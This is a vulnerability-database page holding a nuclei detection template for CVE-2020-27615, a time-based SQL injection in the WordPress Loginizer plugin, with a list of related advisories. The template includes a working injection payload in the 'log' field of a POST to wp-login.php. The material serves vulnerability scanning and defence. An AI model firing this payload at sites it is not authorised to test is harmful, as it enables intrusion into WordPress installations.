Lucene search
K

WordPress Loginizer < 1.6.4 – Unauthenticated SQL Injection via `log` Parameter

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Unauthenticated SQL injection in WordPress Loginizer plugin before 1.6.4 via log parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-27615
22 Oct 202000:51
circl
CNVD
WordPress Loginizer SQL Injection Vulnerability (CNVD-2020-58768)
23 Oct 202000:00
cnvd
Check Point Advisories
WordPress Loginizer Plugin SQL injection (CVE-2020-27615)
26 Oct 202000:00
checkpoint_advisories
CVE
CVE-2020-27615
21 Oct 202020:07
cve
Cvelist
CVE-2020-27615
21 Oct 202020:07
cvelist
Metasploit
WordPress Loginizer log SQLi Scanner
5 Nov 202017:41
metasploit
NVD
CVE-2020-27615
21 Oct 202021:15
nvd
OpenVAS
WordPress Loginizer Plugin < 1.6.4 - Multiple Vulnerabilities
23 Oct 202000:00
openvas
Packet Storm
WordPress Loginizer Log SQL Injection Scanner
1 Sep 202400:00
packetstorm
Prion
Sql injection
21 Oct 202021:15
prion
Rows per page
id: CVE-2020-27615

info:
  name: WordPress Loginizer < 1.6.4 – Unauthenticated SQL Injection via `log` Parameter
  author: intelligent-ears
  severity: critical
  description: |
    The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.
  impact: |
    Unauthenticated attackers can execute SQL injection to extract database contents and execute malicious scripts, potentially compromising the entire WordPress installation and all user data.
  remediation: Fixed in version 1.6.4
  reference:
    - https://web.archive.org/web/20210321225040/https://wpscan.com/vulnerability/10441/
    - https://www.zdnet.com/article/wordpress-deploys-forced-security-update-for-dangerous-bug-in-popular-plugin/
    - https://wpscan.com/vulnerability/10441
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-27615
    cwe-id: CWE-89
    epss-score: 0.53619
    epss-percentile: 0.98865
    cpe: cpe:2.3:a:loginizer:loginizer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: loginizer
    product: loginizer
    framework: wordpress
    publicwww-query: "/wp-content/plugins/loginizer"
  tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev,vuln

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/loginizer/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Loginizer')"
          - compare_versions(version, '< 1.6.4')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        @timeout 10s
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check;

        log='%2cip%3dLEFT(UUID()%2c8)%2curl%3dif(1%3d1%2csleep(7)%2c0)%23&pwd={{password}}&wp-submit=Login&redirect_to=&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'contains_all(body,"wp-admin","user_login")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100a291376dc18881baf4631dd219f76dc665d0ccc1f6700f05da73f43dc6dccd540220277bcd4cb3fab62c350cf2ce8ea11bbf33dba2a0ede1c9b58c627a18829ff92b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.53619
24